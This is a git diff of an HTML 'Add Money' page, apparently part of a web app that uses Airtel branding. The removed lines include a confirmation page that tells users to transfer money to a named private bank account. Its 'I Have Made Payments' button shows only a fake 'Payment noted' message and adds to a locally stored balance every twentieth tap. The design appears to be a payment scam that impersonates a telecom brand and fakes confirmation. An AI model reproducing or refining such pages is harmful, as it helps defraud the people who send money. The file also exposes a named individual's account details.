--- a/add-money.html
+++ b/add-money.html
@@ -1,163 +1,67 @@
-<!-- add-money.html --><!DOCTYPE html><html lang="en">
+<!DOCTYPE html>
+<html>
 <head>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Add Money</title>
   <style>
-    * {
+    body {
+      font-family: sans-serif;
+      background: url('airtel-bg.png') no-repeat center center fixed;
+      background-size: cover;
       margin: 0;
       padding: 0;
-      box-sizing: border-box;
-      font-family: 'Arial', sans-serif;
     }
-    body {
-      background: url('airtel-logo.png') center center / contain no-repeat;
-      background-color: #fff;
-      background-blend-mode: lighten;
-      background-size: 60%;
-      background-attachment: fixed;
-      display: flex;
-      flex-direction: column;
-      align-items: center;
-      justify-content: center;
-      min-height: 100vh;
+    .container {
+      max-width: 400px;
+      margin: 100px auto;
+      background: rgba(255, 255, 255, 0.9);
+      border-radius: 20px;
       padding: 20px;
+      text-align: center;
     }
-    h1 {
-      color: red;
-      margin-bottom: 20px;
+    .airtel-logo {
+      width: 80px;
+      margin-bottom: 10px;
+      animation: spin 5s linear infinite;
+    }
+    @keyframes spin {
+      100% { transform: rotate(360deg); }
     }
     input {
-      padding: 15px;
-      font-size: 16px;
-      border: 2px solid red;
+      width: 90%;
+      padding: 10px;
+      font-size: 18px;
+      margin-bottom: 15px;
       border-radius: 10px;
-      width: 100%;
-      max-width: 300px;
-      margin-bottom: 20px;
-      text-align: center;
+      border: 1px solid #ccc;
     }
     button {
       background: red;
       color: white;
-      padding: 15px 30px;
+      padding: 12px 25px;
+      font-size: 16px;
       border: none;
       border-radius: 10px;
-      font-size: 16px;
       cursor: pointer;
-    }
-    .loader {
-      display: none;
-      width: 60px;
-      height: 60px;
-      border: 6px solid #f3f3f3;
-      border-top: 6px solid red;
-      border-radius: 50%;
-      animation: spin 1s linear infinite;
-      margin-top: 20px;
-    }
-    @keyframes spin {
-      0% { transform: rotate(0deg); }
-      100% { transform: rotate(360deg); }
     }
   </style>
 </head>
 <body>
-  <h1>Add Money</h1>
-  <input type="number" id="amount" placeholder="Enter Amount (min ₦3000)" />
-  <button onclick="continueToFund()">Continue</button>
-  <div class="loader" id="loader"></div>  <script>
-    function continueToFund() {
-      const amount = parseInt(document.getElementById('amount').value);
-      if (amount >= 3000) {
-        document.getElementById('loader').style.display = 'block';
-        setTimeout(() => {
-          localStorage.setItem('addMoneyAmount', amount);
-          window.location.href = 'fund-confirm.html';
-        }, 2000);
-      } else {
-        alert('Minimum amount is ₦3000');
-      }
-    }
-  </script></body>
-</html><!-- fund-confirm.html --><!DOCTYPE html><html lang="en">
-<head>
-  <meta name="viewport" content="width=device-width, initial-scale=1.0">
-  <title>Fund Confirmation</title>
-  <style>
-    body {
-      margin: 0;
-      padding: 20px;
-      font-family: 'Arial', sans-serif;
-      background: url('airtel-logo.png') center center / contain no-repeat;
-      background-color: #fff;
-      background-size: 60%;
-      background-attachment: fixed;
-      background-blend-mode: lighten;
-      display: flex;
-      flex-direction: column;
-      align-items: center;
-    }
-    .card {
-      background: #fff;
-      border-radius: 15px;
-      box-shadow: 0 2px 10px rgba(0,0,0,0.1);
-      padding: 20px;
-      max-width: 350px;
-      width: 100%;
-      text-align: center;
-    }
-    h2 {
-      color: red;
-      margin-bottom: 10px;
-    }
-    p {
-      margin: 5px 0;
-    }
-    button {
-      background: red;
-      color: #fff;
-      border: none;
-      padding: 15px;
-      border-radius: 10px;
-      margin-top: 20px;
-      font-size: 16px;
-      cursor: pointer;
-    }
-    .popup {
-      background: rgba(0,0,0,0.7);
-      color: #fff;
-      padding: 20px;
-      border-radius: 10px;
-      position: fixed;
-      bottom: 20px;
-      font-size: 14px;
-      display: none;
-    }
-  </style>
-</head>
-<body>
-  <div class="card">
-    <h2>Send ₦<span id="amt">3000</span> to:</h2>
-    <p><strong>Account Name:</strong> EMMANUEL OKWUNNA</p>
-    <p><strong>Bank:</strong> SmartCash Payment Service Bank</p>
-    <p><strong>Account Number:</strong> 812 489 0070</p>
-    <button onclick="confirmTap()">I Have Made Payments</button>
+  <div class="container">
+    <img src="airtel-logo.png" class="airtel-logo" alt="Logo" />
+    <h2>Enter Amount</h2>
+    <input type="number" id="amount" placeholder="Minimum ₦3,000" />
+    <button onclick="proceed()">Continue</button>
   </div>
-  <div class="popup" id="popup">✔️ Payment noted! Please wait while we confirm...</div>  <script>
-    const amt = localStorage.getItem('addMoneyAmount') || 3000;
-    document.getElementById('amt').innerText = amt;
 
-    let taps = parseInt(localStorage.getItem('confirmTaps') || '0');
-    function confirmTap() {
-      taps++;
-      localStorage.setItem('confirmTaps', taps);
-      document.getElementById('popup').style.display = 'block';
-      setTimeout(() => document.getElementById('popup').style.display = 'none', 3000);
-
-      if (taps % 20 === 0) {
-        let bal = parseInt(localStorage.getItem('user.balance') || '0');
-        localStorage.setItem('user.balance', bal + 3000);
+  <script>
+    function proceed() {
+      const amount = document.getElementById('amount').value;
+      if (amount >= 3000) {
+        window.location.href = 'fund-confirm.html';
+      } else {
+        alert('Minimum amount is ₦3,000');
       }
     }
-  </script></body>
+  </script>
+</body>
 </html>
